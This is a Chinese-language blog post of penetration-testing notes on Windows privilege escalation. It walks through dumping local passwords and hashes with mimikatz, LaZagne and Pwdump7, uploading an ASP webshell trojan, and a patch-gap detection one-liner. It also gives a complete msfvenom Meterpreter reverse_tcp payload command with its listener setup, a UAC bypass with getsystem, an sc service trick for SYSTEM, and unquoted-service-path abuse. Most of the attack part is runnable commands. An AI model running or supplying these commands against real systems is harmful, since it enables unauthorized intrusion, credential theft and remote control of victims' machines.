Windows提权

  1. Windows密码安全性测试:
    • 本地管理员密码如何直接提取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解):
      • 直接通过mimikatz读取管理员密码:
      • 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php
        • 把这两个目录导入到kali自带工具里:

         

         

      • 通过lazagne工具提取密码:
        • 读取本地计算机所有密码

         

      • 使用Pwdump7获取密码hash值,使用kali MSF hash登录系统
        • 点击 Pwdump7.bat 生成本地hash值

         

         

         

  2. Windows权限提升:
    • 常用命令:
      • setp c:\test\cmd.exe       //设置读取固定路径下的cmd
      •  echo y|cacls "C:\wmpub" /t /p everyone:f     //设置wmpub权限为everyone

       

    • 常见提权方法:
      • 溢出漏洞提权
      • 数据库提权
      • 第三方软件提权
    • 微软官方提权exp:
    • 微软官方时刻关注列表网址:
      • https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017
    • 查找可以提权的漏洞:
      • 快速查找未打补丁的 exp,可以最安全的减少目标机的未知错误,以免影响业务。 命令行下执行检测未打补丁的命令如下:
        systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
    • 上传交互式提权工具pr.exe到服务器:
      • 登录普通用户1234,然后执行 systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt  查看有哪些未打补丁的exp,然后在github找到对应的工具进行提权

       

       

       

    • 问题:
      • 上传木马到服务器,获取webshell权限,进入虚拟终端,发现执行不了操作系统命令,所以需要提权

       

    • 思路:
      • 上传木马查看哪些目录具备读写权限,然后把自己的cmd传到靶机具备读写权限的目录下,使用自己的cmd命令行执行操作系统命令
    • 详细:
      • 把读取目录权限木马11.asp上传至服务器
      • 设置cmd执行路径:setp c:\wmpub\cmd.exe

       

       

       

       

       

    • 问题2:
      • 普通命令可以执行,操作系统命令执行不了,需要开启3389,普通用户开启不了3389,需要提权之后开启

       

    • 思路1:
      •  使用3389提权工具开启

       

  3. MSF Meterpreter后渗透提权:
    • 问题:
      • Kali  MSF进行提权  |  win7绕过uac 执行getsystem提权为系统权限
    • 思路:
      • 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:
        msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.133  lport=4444 -f exe -o /tmp/hack.exe
        这里我们为生成的木马指定了payload为:
        windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
      • use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST    192.168.56.133
        show options
      • getuid  查看当前权限​​​​​​​
getsystem 提权系统权限
    • 详细:
      • 生成的payload.exe上传到服务器
      • win2003 点击payload.exe 然后kali执行反弹shell成功
      • 把生成的payload.exe通过菜刀上传至win7服务器,通过exploit本地监听建立会话
      • 发现getsystem提权失败,转换思路,绕过uac,使用溢出攻击本地会话 use exploit/windows/local/ask,提权成功

       

       

       

       

       

       

  4. Windows7、8、08、12、16系统提权:
    • SC命令提权:(由administrator->system)
      • SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
      • sc Create syscmd binPath= "cmd /K start" type= own type= interact
      • 创建一个名叫syscmd的新的交互式的cmd服务
      • sc start syscmd,就得到了一个system权限的cmd环境
    • 不带引号的服务路径:
      • ​​​​​​​当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
      • 使用以下命令查看错误配置的路径
      • wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
      • 把木马文件重命名系统文件夹带空格的前缀,放到网站根目录,如果有系统文件夹里边有带空格的,开机则会自动运行这个木马

       

       

    • 不安全的服务权限:
      • 通过修改第三方服务来获取系统权限,不过一般不太好用
    • AlwaysInstallElevated
      • 通过修改注册表的方式来进行提权
    • Unattended Installs

     










 

版权声明:本文为qq_41755666原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。